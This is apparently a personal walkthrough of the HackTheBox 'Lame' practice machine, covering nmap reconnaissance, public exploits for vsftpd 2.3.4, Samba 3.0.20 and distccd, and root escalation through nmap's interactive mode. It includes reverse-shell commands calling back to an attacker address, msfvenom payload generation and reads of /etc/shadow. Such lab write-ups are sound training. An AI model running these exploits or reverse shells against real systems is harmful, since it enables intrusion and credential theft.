HackTheBox: Lame

[Reconnaissance]

1. Port Scan

nmap -Pn <ip>

2. High port number scan

nmap -Pn -p- <ip>

There’re port no. 21, 22, 139, 445, and 3632.

,

3. Scan for everything

nmap -A -p-3632 <ip>

There’re FTP with anonymous login, vsFTPD 2.3.4, openSSH 4.7p1, Samba 3.0.20, and Distccd.

4. Vulnerability scan

nmap --script vuln <ip>

Nothing useful

5. Samba scan

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>

There’re 2 interesting path: /opt and /tmp

[Exploitation]

1. FTP

Login with anonymous

ftp <ip>

ls

Nothing useful.

Search for exploits

searchsploit vsftpd 

There’s a backdoor command execution, But I won’t use Metasploit.

Search vsftpd 2.3.4 exploit with google. I came across to this.

In2econd/vsftpd-2.3.4-exploit

wget https://raw.githubusercontent.com/In2econd/vsftpd-2.3.4-exploit/master/vsftpd_234_exploit.py

python3 vsftpd_234_exploit.py <ip> <port> whoami

Failed!!!

3. Samba

smbclient //10.10.10.3/anonymous

Failed!!!

macha97/exploit-smb-3.0.20

wget https://raw.githubusercontent.com/macha97/exploit-smb-3.0.20/master/exploit-smb-3.0.20.py

View the code, I have to replace shellcode.

Generate new shell code.

msfvenom -p cmd/unix/reverse_netcat LHOST=<ip> LPORT=1234 -f python

Replace shellcode

Create listener

nc -lvp 1234

Run the exploit.

python exploit-smb-3.0.20.py

Now I have a shell

id

Spawn TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

4. Distcc

Search for exploits

searchsploit distcc

There’s an exploit, but I won’t use Metasploit.

Search for distcc with google, I came acrosss to this script

https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

wget https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/48ab4eb0bd69cac67bc97fbe182e39e5ded99f9f/distccd_rce_CVE-2004-2687.py

Try the script

python distccd_rce_CVE-0224-2687.py -t <ip> -p 3632 -c whoami

Let’s get reverse shell.

Set up listener

nc -lvp 1234

Try reverse shell command. Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

python distccd_rce_CVE-0224-2687.py -t <ip> -p 3632 -c 'bash -i >& /dev/tcp/<attacker ip>/1234 0>&1'

Failed!!!

Let’s try another one

python distccd_rce_CVE-0224-2687.py -t <ip> -p 3632 -c 'nc -e /bin/sh <attacker ip> 1234'

Now I have connection.

id

Spawning tty shell.

python -c 'import pty;pty.spawn("/bin/bash");'

Verify /etc/passwd permission

ls -l /etc/passwd

I cannot edit, since It’s belong to root.

Verify that I can run sudo.

sudo -l

I can’t.

Try to read shadow file

cat /etc/shadow

Find shadow backup

find / 2>>/dev/null | grep "shadow"

Read the file

cat /var/backups/shadow.bak

Failed!!!

Search for SUID.

find / -perm -u=s -type -f 2>/dev/null

I may escalate privilege with nmap.

nmap --interactive
!sh

Verify user

id
whoami

Now, I am root.

cd /home/makis
cat user.txt

cd /root
cat root.txt